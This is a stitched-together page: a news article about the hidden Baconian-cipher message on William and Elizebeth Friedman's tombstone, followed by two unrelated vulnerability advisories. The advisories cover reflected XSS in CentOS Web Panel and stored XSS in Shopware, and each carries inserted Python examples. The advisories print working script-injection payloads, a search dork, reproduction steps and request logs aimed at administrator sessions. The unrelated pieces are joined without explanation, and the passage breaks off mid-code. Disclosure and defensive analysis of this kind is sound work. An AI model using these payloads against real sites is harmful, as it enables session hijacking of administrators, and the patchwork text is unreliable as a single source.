Unlocked: The hidden love note on the grave of America’s first crypto power-couple

Shmoocon Among the 400,000 graves at the Arlington National Cemetery – a solemn US military graveyard in Virginia – lies the final resting place of cryptography pioneers William and Elizebeth Friedman.

And hidden in code on their tombstone is a touching tribute from a wife to her husband, a code that has only now been cracked, decades after it was engraved in the cool stone.

William, born 1891, and Elizebeth, born a year later, married in 1917.

Among many cryptological feats, the couple trained America’s first cadre of code-breakers after developing an interest in cryptography while examining the so-called Baconian cipher – developed by the British Elizabethan cryptographer Sir Francis Bacon.

William coined the term cryptanalysis, and led the team that broke the key Japanese World War II cipher Purple – so named because transcripts were kept in purple folders.

Meanwhile, Elizebeth was America’s first woman cryptanalyst, and encouraged her husband to pursue cryptography. She also worked with the US government to break the communication codes of rum runners during the prohibition era, and helped crack Germany’s Enigma machine ciphers during World War II.

In 1969, at the age of 78, William died, and was buried at Arlington. His wife designed his gravestone, consisting of a pair of crossed flags – the symbol of William’s military signals unit – and one of his favorite phrases, “Knowledge is power,” a quote attributed to Sir Francis.

The same phrase appeared in code in the graduation photograph of the 1918 code-breakers class the Friedmans taught, in which some of the students faced sideways and others looked straight at the camera. The direction of their faces spelled out a phrase using the Baconian cipher.

Smart … Part of the crypto-class graduation photo in 1918

Sir Francis came up with a code whereby every letter of the alphabet is represented by a group of five 'a' or 'b' letters – in effect a five-bit binary code, which in Bacon's original table covers 24 letters because I and J share a group, as do U and V. For example, N is 'abbaa' and O is 'abbab'. In the class photo, by reading the direction of each person's face – ahead or to the side – as an 'a' or a 'b', and running the result through the cipher, the class lineup spelled out: KNOWLEDGE IS POWER.

Shortly after moving to Washington DC, cryptographer Elonka Dunin paid a visit to the Friedmans' grave. Elizebeth was buried alongside her husband after her death in 1980, and her name was added to the tombstone. Dunin noticed something odd: the phrase "Knowledge is Power" is chiseled into the stone using a mix of serif and sans-serif letter designs.

If you take each serif letter as a 'b' and each sans-serif letter as an 'a', the phrase converts to 'babaa aabab aabab', provided you discount the final letter R – fifteen letters, or exactly three groups of five.

Running that sequence through the Baconian cipher spells out WFF, William’s initials. Dunin told this year’s Shmoocon computer security conference in Washington DC on Friday that she believes this is a hidden note to William from his wife when she designed his gravestone.
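Bacon's scheme is steganography as much as cipher: a five-bit code carried by some visible property of an innocent cover, face direction in the 1918 photo, serif versus sans-serif on the stone. The Python below is an added example, not code from the article or from Dunin's talk. It builds Bacon's original 24-letter table (I/J and U/V share a group), decodes the groups Dunin read off the tombstone, and, as a stand-in for the font trick, hides a message in a cover text by letter case, upper case playing 'b'. That case convention is this example's assumption, not how the stone works.

```python
from itertools import product

# Bacon's original biliteral alphabet has 24 letters: J is written as I and V as U.
# The five-letter a/b groups are assigned in counting order (aaaaa, aaaab, aaaba, ...).
_LETTERS = "ABCDEFGHIKLMNOPQRSTUWXYZ"
_GROUPS = ["".join(bits) for bits in product("ab", repeat=5)][:24]
ENCODE = dict(zip(_LETTERS, _GROUPS))
DECODE = {group: letter for letter, group in ENCODE.items()}
ENCODE["J"] = ENCODE["I"]   # the merges make decoding of I/J and U/V ambiguous
ENCODE["V"] = ENCODE["U"]


def bacon_encode(plaintext: str) -> str:
    """Space-separated a/b groups for the letters of plaintext; other characters are dropped."""
    return " ".join(ENCODE[c] for c in plaintext.upper() if c.isalpha())


def bacon_decode(groups: str) -> str:
    """Decode a/b groups (spaces optional); the bit count must be a multiple of five."""
    bits = groups.lower().replace(" ", "")
    if len(bits) % 5 or set(bits) - {"a", "b"}:
        raise ValueError("expected five-letter groups of 'a' and 'b'")
    return "".join(DECODE[bits[i:i + 5]] for i in range(0, len(bits), 5))


def hide(message: str, cover: str) -> str:
    """Embed message in cover: each cover letter carries one bit, rendered here as
    lower case for 'a' and upper case for 'b' (the stone used sans-serif/serif).
    Non-letters, and letters left over once the bits run out, pass through unchanged."""
    bits = bacon_encode(message).replace(" ", "")
    if sum(c.isalpha() for c in cover) < len(bits):
        raise ValueError(f"cover has too few letters: need {len(bits)}")
    out, i = [], 0
    for c in cover:
        if c.isalpha() and i < len(bits):
            out.append(c.upper() if bits[i] == "b" else c.lower())
            i += 1
        else:
            out.append(c)
    return "".join(out)


def reveal(stego: str) -> str:
    """Read the bits back out of the letter case and decode; trailing letters that do not
    fill a whole group are discarded, just as Dunin discounted the final R on the stone."""
    bits = "".join("b" if c.isupper() else "a" for c in stego if c.isalpha())
    return bacon_decode(bits[: len(bits) - len(bits) % 5])


# The groups Dunin read off the tombstone (serif = b, sans-serif = a, final R dropped).
TOMBSTONE_GROUPS = "babaa aabab aabab"

if __name__ == "__main__":
    print(bacon_decode(TOMBSTONE_GROUPS))          # WFF
    print(bacon_encode("KNOWLEDGE IS POWER"))
    stone = hide("WFF", "Knowledge is Power")
    print(stone, "->", reveal(stone))
```

Decoding is lossy for I/J and U/V: `bacon_decode(bacon_encode("JULIUS"))` comes back as IULIUS, which is why Bacon's own messages read oddly to modern eyes and why a 26-letter variant is often used today.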

Encoded … ‘Knowledge is power’ written on the couple’s tombstone

The pair had a reputation for this sort of thing. They wrote a book together in 1957 called The Shakespearean Ciphers Examined, which thoroughly debunked the theory that Sir Francis wrote many of the Bard’s plays and left coded clues in his manuscripts.

On page 257 of the book, in the bottom paragraph, the authors set certain letters in bold and left others untouched. When translated using Bacon's cipher, the message reads: "I did not write the plays, F Bacon."

Confirmation … A note planning the grave’s design

The final confirmation of Dunin’s theory about the tombstone came after an examination of the Friedman papers in the Marshall Library, where a note by Elizebeth was found indicating how the WFF message was generated – by breaking up “Knowledge is Power” into three letters using Sir Francis’ algorithm.

Like all mortals, cryptographers die – but their hidden notes live on unbroken for decades, if not forever. ®

https://www.theregister.co.uk/2018/01/20/friedman_cryptographic_grave_message/

CentOS Web Panel 0.9.8.12 Cross Site Scripting

Document Title:
===============
CentOS Web Panel v0.9.8.12 – Non-Persistent Cross Site Scripting Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1835

Release Date:
=============
2018-01-17

Vulnerability Laboratory ID (VL-ID):
====================================
1835

Common Vulnerability Scoring System:
====================================
3.3

Vulnerability Class:
====================
Cross Site Scripting – Non Persistent

Current Estimated Price:
========================
500€ – 1.000€

Product & Service Introduction:
===============================
CentOS Web Panel – a free web hosting control panel designed for quick and easy management of (dedicated and VPS) servers without
the need to use the ssh console for every little thing. There are lots of options and features for server management in this control panel.
CWP automatically installs a full LAMP stack on your server (apache, php, phpmyadmin, webmail, mailserver…).

(Copy of the Homepage: http://centos-webpanel.com/features )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side cross site scripting vulnerability in the CentOS Web Panel v0.9.8.12.

Vulnerability Disclosure Timeline:
==================================
2018-01-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
CWP
Product: CentOS Web Panel – (CWP) 0.9.8.12

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12.
The vulnerability allows remote attackers to inject script code into the client-side browser session via crafted application requests.

The client-side cross site scripting web vulnerability is located in the `module` value of the `index.php` file GET method request.
The vulnerability can be exploited by remote attackers with a prepared malicious link to the CentOS Web Panel application.
The request method to inject is GET and the attack vector is non-persistent (reflected). The injection point is the `module` parameter
and the execution point is the "module does not exist" error message, which echoes the parameter value without encoding it.

The security risk of the web vulnerability is estimated as medium with a CVSS (common vulnerability scoring system) count of 3.3.
Exploitation of the non-persistent vulnerability requires no privileged web-application user account and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious sources and non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] index.php

Vulnerable Parameter(s):
[+] module

Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote attackers without a privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Dork(s):
“powered by CentOS-WebPanel.com”

PoC: Payload(s)
http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=evil.source%20onload=alert%28document.cookie%29%20%3C
http://localhost:2030/index.php?module=clam

PoC: Exception-Handling
<div class="row">
The module clam>"<[CLIENT SIDE SCRIPT CODE PAYLOAD EXECUTION!]> does not exist.
</div><!-- End .row -->
</div><!-- End contentwrapper -->
</div><!-- End #content -->
</div><!-- End #wrapper -->

— PoC Session Logs [GET] —
Status: 200[OK]
GET http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%20%3C
Mime Type[text/html]
Request Header:
Host[localhost:2030]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
Connection[keep-alive]
Response Header:
Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
X-Powered-By[PHP/5.4.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]

Reference(s):
http://localhost:2030/
http://localhost:2030/index.php
http://localhost:2030/index.php?module

Solution – Fix & Patch:
=======================
The vulnerability can be patched by sanitizing the vulnerable `module` parameter of the `index.php` file GET method request.
Disallow special characters and restrict the parameter input (for example to an allowlist of known module names) to prevent further client-side script code injection attacks.
Escape the output of the error message for invalid inputs, so that the execution point of the client-side vulnerability no longer renders the parameter value as HTML.
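The payload in the PoC URL only works because the "does not exist" message echoes the raw `module` value. As an added example (not CWP's code; the advisory does not reproduce the PHP), the Python below decodes the PoC URL the way the server would, models the error message once as the PoC shows it and once with the output HTML-escaped, and checks which version lets the parameter back out as live markup. The module allowlist is an assumption made for the example; CWP's real module list is not on the page.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# The first PoC URL from the advisory, verbatim.
POC_URL = ("http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=evil.source"
           "%20onload=alert%28document.cookie%29%20%3C")

# Assumption for the example: module names the dispatcher would accept.
KNOWN_MODULES = {"clam", "dashboard", "users"}


def module_param(url: str) -> str:
    """The decoded module= value as the application sees it after URL decoding."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("module", [""])[0]


def render_error_vulnerable(module: str) -> str:
    """Reconstruction of the sink in the PoC: the parameter is interpolated into HTML as-is."""
    return f'<div class="row">\nThe module {module} does not exist.\n</div>'


def render_error_fixed(module: str) -> str:
    """Hardened sink: HTML-escape at the output point, so <, >, " and ' become entities
    and the browser shows the attacker's text instead of parsing it as markup."""
    return f'<div class="row">\nThe module {html.escape(module, quote=True)} does not exist.\n</div>'


def dispatch(module: str, render_error) -> str:
    """Load a known module, otherwise fall through to the error message (the execution point)."""
    if module in KNOWN_MODULES:
        return f"module {module} loaded"
    return render_error(module)


_TEMPLATE_TAGS = ('<div class="row">', "</div>")
_TAG_START = re.compile(r"<\s*/?[a-z]", re.I)


def reflects_markup(url: str, render_error) -> bool:
    """True if any tag in the response did not come from the template itself."""
    body = dispatch(module_param(url), render_error)
    for tag in _TEMPLATE_TAGS:
        body = body.replace(tag, "")
    return _TAG_START.search(body) is not None


if __name__ == "__main__":
    print(repr(module_param(POC_URL)))
    print("vulnerable reflects markup:", reflects_markup(POC_URL, render_error_vulnerable))
    print("fixed reflects markup:     ", reflects_markup(POC_URL, render_error_fixed))
```

Escaping on output is the fix that holds regardless of what the parameter contains; the allowlist is defence in depth, since a module name never legitimately needs `<`, `"` or whitespace.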

Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the centos web panel is estimated as medium (CVSS 3.3).

Credits & Authors:
==================
Benjamin Kunz Mejri (Vulnerability Laboratory) – https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com – www.vulnerability-db.com – www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php – vulnerability-lab.com/list-of-bug-bounty-programs.php – vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php – vulnerability-lab.com/rss/rss_upcoming.php – vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab – facebook.com/VulnerabilityLab – youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact ([email protected]) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory – [Evolution Security GmbH]™


VULNERABILITY LABORATORY – RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Shopware 5.2.5 / 5.3 Cross Site Scripting

Document Title:
===============
Shopware 5.2.5 & v5.3 – Multiple Cross Site Scripting Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1922

Shopware Security Tracking ID: SW-19834

Security Update:
http://community.shopware.com/Downloads_cat_448.html#5.3.4
http://community.shopware.com/_detail_2035.html

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15374

CVE-ID:
=======
CVE-2017-15374

Release Date:
=============
2017-09-05

Vulnerability Laboratory ID (VL-ID):
====================================
1922

Common Vulnerability Scoring System:
====================================
4.4

Vulnerability Class:
====================
Cross Site Scripting – Persistent

Current Estimated Price:
========================
1.000€ – 2.000€

Product & Service Introduction:
===============================
Shopware is a modular online shop system that has been developed in Germany since 2004. It is available both as
open source software and in commercial editions. Its functions can be extended by installing additional plugins.
An open API allows third-party systems, such as payment services or ERP systems, to be connected. The system is
multi-shop capable, so several shops on different domains can be run within one installation. Multi-client
capability (complete separation of the multishops in the administration area) is not provided by default, but
can be achieved in a cluster.

(Copy of the Vendor Homepage: https://en.shopware.com/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple stored cross site scripting vulnerabilities in the official Shopware v5.2.5 & v5.3 CMS.

Vulnerability Disclosure Timeline:
==================================
2016-10-07: Researcher Notification & Coordination (Benjamin Kunz Mejri – Evolution Security GmbH)
2016-10-08: Vendor Notification (Shopware Security Team)
2016-**-**: Vendor Response/Feedback (Shopware Security Team)
2017-**-**: Vendor Fix/Patch (Shopware Service Developer Team)
2017-09-05: Public Disclosure (Vulnerability Laboratory)
2017-10-25: Security Acknowledgements (Shopware Developer Team)
2017-10-25: Security Acknowledgements (Shopware Security Team)

Discovery Status:
=================
Published

Affected Product(s):
====================
Shopware AG
Product: Shopware – Content Management System (Web-Application) 5.2.5

Shopware AG
Product: Shopware – Content Management System (Web-Application) 5.3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
Shopware v5.2.5 – v5.3 is vulnerable to cross site scripting in the customer and order sections of the content management
system backend modules. Remote attackers are able to inject malicious script code into the firstname, lastname or order
input fields to provoke a persistent execution in the customer and orders sections of the backend. The execution occurs
in the Shopware administrator backend listing when an administrator previews the customers (Kunden) or orders (Bestellungen).
The injection can be performed through user registration or by manipulating the order information inputs.
The issue can be exploited by low privileged user accounts against higher privileged admin or moderator accounts.

The security risk of the bugs is estimated as medium with a CVSS (common vulnerability scoring system) count of 4.4.
Exploitation of the issue requires a low privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent
external redirects to malicious sources and application-side manipulation of affected or connected module context.

Request Method(s):
[+] POST (Registration)
[+] POST (Order Item)
[+] POST (Profile Update)

Vulnerable Input(s):
[+] Firstname
[+] Lastname
[+] Order Name

Affected Module(s):
[+] Kunden (Customers)
[+] Bestellungen (Orders)

Proof of Concept (PoC):
=======================
The cross site scripting vulnerabilities can be exploited by remote attackers with a low privileged Shopware user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability …
1. Open the browser and surf to the target Shopware v5.2.5 web-application
2. Move to the registration form
3. Include a script code payload (an iframe tag with src and onload attributes) in the firstname, lastname and name parameters
4. Submit the request via POST method to register the account
5. Move to the inbox and activate the account via the verification link
Note: The payloads are now saved, executable, in the Kunden (Customers) section of the backend
6. The administrator next visits the Kunden (Customers) section to preview
7. The script code payload executes in the customers list
8. As the next step the attacker places an order via the shop
Note: The order name manipulated via the registration data is also able to execute script code in this context
9. The administrator next visits the Bestellungen (Orders) section to preview
10. The script code payload executes in the orders list
11. Both cross site scripting vulnerabilities are successfully reproduced!

Note: Attackers are able to inject malicious redirects, frames with payloads or other script code tags.
The basic web validation filter of the Shopware content management system does not encode the list context.

PoC: Vulnerable Source (Execution in Orders – Bestellungen)
<tr class="x-grid-row x-grid-row-alt"><td class=" x-grid-cell x-grid-cell-gridcolumn-1496
x-grid-cell-special x-grid-cell-row-checker x-grid-cell-first"><div class="x-grid-cell-inner "
style="text-align: left; ;"><div class="x-grid-row-checker">&nbsp;</div></div></td><td class="
x-grid-cell x-grid-cell-gridcolumn-1428 "><div class="x-grid-cell-inner " style="text-align: left;
;">20.08.2016 08:34</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1429
"><div class="x-grid-cell-inner " style="text-align: left; ;">20044</div></td><td class="
x-grid-cell x-grid-cell-gridcolumn-1430 "><div class="x-grid-cell-inner " style="text-align: left; ;">
536,80</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1431 "><div class="x-grid-cell-inner "
style="text-align: left; ;">&nbsp;</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1432 ">
<div class="x-grid-cell-inner " style="text-align: left; ;">Rechnung</div></td><td class=" x-grid-cell
x-grid-cell-gridcolumn-1433 "><div class="x-grid-cell-inner " style="text-align: left; ;">Standard Versand</div></td>
<td class=" x-grid-cell x-grid-cell-gridcolumn-1434 "><div class="x-grid-cell-inner " style="text-align: left; ;">
Hauptshop Deutsch</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1435 "><div class="x-grid-cell-inner "
style="text-align: left; ;">Mar'Da>"<iframe src="evil.source" onload="alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!]" <=""
korat="">"<iframe src=evil.source onload=alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!] <</div></td><td class=" x-grid-cell
x-grid-cell-gridcolumn-1436 " ><div class="x-grid-cell-inner " style="text-align: left; ;"><a href="mailto:[email protected]
data-qtip="[email protected]">[email protected]</a></div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1437
" ><div class="x-grid-cell-inner " style="text-align: left; ;">Offen</div></td><td class=" x-grid-cell
x-grid-cell-gridcolumn-1438 " ><div class="x-grid-cell-inner " style="text-align: left; ;">Offen</div></td>
<td class=" x-grid-cell x-grid-cell-actioncolumn-1405 x-action-col-cell x-grid-cell-last" >
<div class="x-grid-cell-inner " style="text-align: left; ;">
<img alt="" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=="
class="x-action-col-icon x-action-col-0 sprite-user " data-qtip="Kunde öffnen" data-action="openCustomer" />
<img alt="" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=="
class="x-action-col-icon x-action-col-1 sprite-minus-circle-frame " data-qtip="Bestellung löschen"
data-action="deleteOrder" /><img alt="" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=="
class="x-action-col-icon x-action-col-2 sprite-pencil " data-qtip="Zeige Details" data-action="editOrder" /></div></td></tr>
<tr class="x-grid-row " ><td class=" x-grid-cell x-grid-cell-gridcolumn-1496 x-grid-cell-special
x-grid-cell-row-checker x-grid-cell-first" ><div class="x-grid-cell-inner " style="text-align: left; ;">
<div class="x-grid-row-checker"> </div></div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1428 " >
<div class="x-grid-cell-inner " style="text-align: left; ;">19.08.2016 15:50</div></td><td class=" x-grid-cell
x-grid-cell-gridcolumn-1429 " ><div class="x-grid-cell-inner " style="text-align: left; ;">20051</div></td>
<td class=" x-grid-cell x-grid-cell-gridcolumn-1430 " ><div class="x-grid-cell-inner "
style="text-align: left; ;">308,75</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1431 " >
<div class="x-grid-cell-inner " style="text-align: left; ;"> </div></td>

PoC: Vulnerable Source (Execution in Customers – Kunden)
<div class="x-window x-customer-detail-window x-layer x-window-default x-closable x-window-closable x-window-default-closable"
style="left: 124px; top: 26px; width: 1093px; height: 458px; z-index: 39041;" id="customer-detail-window-2311" tabindex="-1">
<div style="-moz-user-select: none; left: -1px; top: -1px; width: 1093px;" class="x-window-header x-window-header-draggable
x-docked x-window-header-default x-horizontal x-window-header-horizontal x-window-header-default-horizontal x-top
x-window-header-top x-window-header-default-top x-docked-top x-window-header-docked-top x-window-header-default-docked-top
x-unselectable" id="customer-detail-window-2311_header"><div style="width: 1091px;" id="customer-detail-window-2311_header-body"
class="x-window-header-body x-window-header-body-default x-window-header-body-horizontal x-window-header-body-default-horizontal
x-window-header-body-top x-window-header-body-default-top x-window-header-body-docked-top x-window-header-body-default-docked-top
x-window-header-body-default-horizontal x-window-header-body-default-top x-window-header-body-default-docked-top x-box-layout-ct">
<div style="width: 1066px; height: 154px;" id="customer-detail-window-2311_header-innerCt" class="x-box-inner "
role="presentation"><div id="customer-detail-window-2311_header-targetEl" style="position:absolute;width:20000px;
left:0px;top:0px;height:1px"><div class="x-component x-window-header-text-container x-box-item x-component-default"
style="text-align: left; left: 0px; top: 0px; margin: 0px; width: 1049px;" id="customer-detail-window-2311_header_hd">
<span id="customer-detail-window-2311_header_hd-textEl" class="x-window-header-text x-window-header-text-default">
Kundenkonto: Mar'Da"><iframe src="evil.source" onload="alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!]" <=""
korat"=""><iframe src=evil.source onload=alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!] < (20019)</iframe></span></div>
<div class="x-tool x-box-item x-tool-default" style="width: 15px; height: 15px; left: 1051px; top: 70px; margin: 0px;" id="tool-2312">
<img id="tool-2312-toolEl" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=="
class="x-tool-close" role="presentation"></div></div></div></div>

— PoC Session Logs [POST] —
Status: 200[OK]
POST http://shopware.localhost:8080/backend/customer/save?_dc=1471541475086&customerID=22
Mime Type[application/json]
Request Header:
Host[shopware.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Content-Type[application/json]
X-Requested-With[XMLHttpRequest]
Referer[http://shopware.localhost:8080/backend/]
Cookie[SHOPWAREBACKEND=fv4u2kg63p3ff3ht6kd6var803; test; x-ua-device=desktop; session-1=e7f8815a87d6cfa5552abf58325ca4fa184f7b69f9d45ff7b101c17f7ee0a255;]
Connection[keep-alive]
POST data:
{"id":22,"groupKey":"EK","email":"[email protected]","active":true,"accountMode":0,"confirmationKey":
"","paymentId":5,"firstLogin":"2016-08-18T00:00:00","lastLogin":"2016-08-18T17:22:23","newsletter":0,"validation":0,
"languageId":1,"shopId":1,"priceGroupId":0,
"internalComment":"TEST-comment","failedLogins":0,"referer":"","default_billing_address_id":22,
"default_shipping_address_id":22,
"newPassword":"","amount":402.9,"orderCount":1,"canceledOrderAmount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":"16.05.1985","title":"",
"salutation":"mr","firstname":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",
"lastname":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",
"number":"20028","billing":[{"id":22,"salutation":"mr","company":"",
"department":"","firstName":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",
"title":"","lastName":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",
"street":"Teststraße","zipCode":"72202","city":"Nagold","additionalAddressLine1":"","additionalAddressLine2":"",
"salutationSnippet":"Herr","countryId":2,"number":"","phone":"",
"vatId":"","stateId":null}],"shipping":[{"id":23,"salutation":"mr","company":"","department":"",
"firstName":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"",
"lastName":"TEST[INJECTED SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",
"street":"Teststraße","zipCode":"72202","city":"Nagold","additionalAddressLine1":"",
"additionalAddressLine2":"","salutationSnippet":"Herr","countryId":2,"stateId":null}],"debit":
[],"paymentData":[{"accountNumber":"","bankCode":"","bankName":"","accountHolder":"","bic":"",
"iban":"","useBillingData":false,"id":null}]}]
Response Header:
Server[nginx/1.8.1]
Content-Type[application/json]
Connection[keep-alive]
Set-Cookie[SHOPWAREBACKEND=88g31dgs8lem6cun3ldjq4l3f2; path=/backend/; HttpOnly]

Status: 200[OK]
POST http://shopware.localhost:8080/backend/Log/createLog
Mime Type
[application/json]
Request Header:
Host[shopware.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://shopware.localhost:8080/backend/]
Cookie[SHOPWAREBACKEND=88g31dgs8lem6cun3ldjq4l3f2; test; x-ua-device=desktop;
session-1=e7f8815a87d6cfa5552abf58325ca4fa184f7b69f9d45ff7b101c17f7ee0a255;]
Connection[keep-alive]
POST data:
type[backend]
key[Kunden]
text[Kunde%2020028%20wurde%20gespeichert]
user[Demo-Admin]
value4[]
Response Header:
Server[nginx/1.8.1]
Content-Type[application/json]
Connection[keep-alive]
Set-Cookie[SHOPWAREBACKEND=hmb3lqokn3bkr6kvpo1o6vi4o6; path=/backend/; HttpOnly]

Status: 200[OK]
GET http://shopware.localhost:8080/backend/evil.source[PERSISTENT SCRIPT CODE EXECUTE!]
Mime Type[text/html]
Request Header:
Host[shopware.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Referer[http://shopware.localhost:8080/backend/]
Cookie[SHOPWAREBACKEND=p56ursgfdc6f1tbh0s35detvc5; test; x-ua-device=desktop;
session-1=e7f8815a87d6cfa5552abf58325ca4fa184f7b69f9d45ff7b101c17f7ee0a255;]
Connection[keep-alive]
Response Header:
Server[nginx/1.8.1]
Content-Type[text/html; charset=UTF-8]
Connection[keep-alive]
Set-Cookie[SHOPWAREBACKEND=v3mhes99ai1hsolj8vddjkbci2; path=/backend/; HttpOnly]

Reference(s):
http://shopware.localhost:8080/
http://shopware.localhost:8080/backend/
http://shopware.localhost:8080/backend/Log/
http://shopware.localhost:8080/backend/customer/
http://shopware.localhost:8080/backend/Log/createLog
http://shopware.localhost:8080/backend/customer/save
http://shopware.localhost:8080/backend/AttributeData/
http://shopware.localhost:8080/backend/AttributeData/list

Solution – Fix & Patch:
=======================
The XSS vulnerabilities can be patched by securely encoding the customer (Kunden) and orders (Bestellungen) context listings.
Encode or escape the values on output in the list context, and disallow special characters during registration or when adding data, to prevent further script code injection attacks.

The vulnerability is resolved by updating to version 5.3.4, which is delivered by the manufacturer. The issue risk is marked as moderate.
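Updating to 5.3.4 fixes the output encoding of the backend grids, but customer and order records injected before the update are still in the database and still render wherever another consumer (an export, a plugin, a mail template) fails to encode them. The Python below is an added example, not Shopware code: it walks a customer record of the shape seen in the `backend/customer/save` body above and reports every string field that carries markup, an inline event handler or a `javascript:` URL, so poisoned rows can be found and cleaned. The record is constructed for the example.

```python
import json
import re
from typing import Dict, Iterator, List, Tuple

# Constructed customer record, shaped like the backend/customer/save body in the session log above.
SAMPLE_CUSTOMER = json.dumps({
    "id": 22, "email": "test@example.com", "active": True,
    "firstname": 'TEST>"<iframe src=./evi.source onload=alert(document.cookie) <',
    "lastname": "Mustermann",
    "internalComment": "TEST-comment",
    "billing": [{"id": 22, "firstName": 'TEST>"<iframe src=./evi.source onload=alert(document.cookie) <',
                 "lastName": "Mustermann", "street": "Teststraße", "zipCode": "72202", "city": "Nagold"}],
    "shipping": [{"id": 23, "firstName": "Max", "lastName": "<svg/onload=alert(1)>", "city": "Nagold"}],
    "paymentData": [{"iban": "", "accountHolder": "javascript:alert(1)", "useBillingData": False}],
})

# Things a name, street or account holder never legitimately contains.
MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z!]")        # start of a tag, or <!-- / <!DOCTYPE
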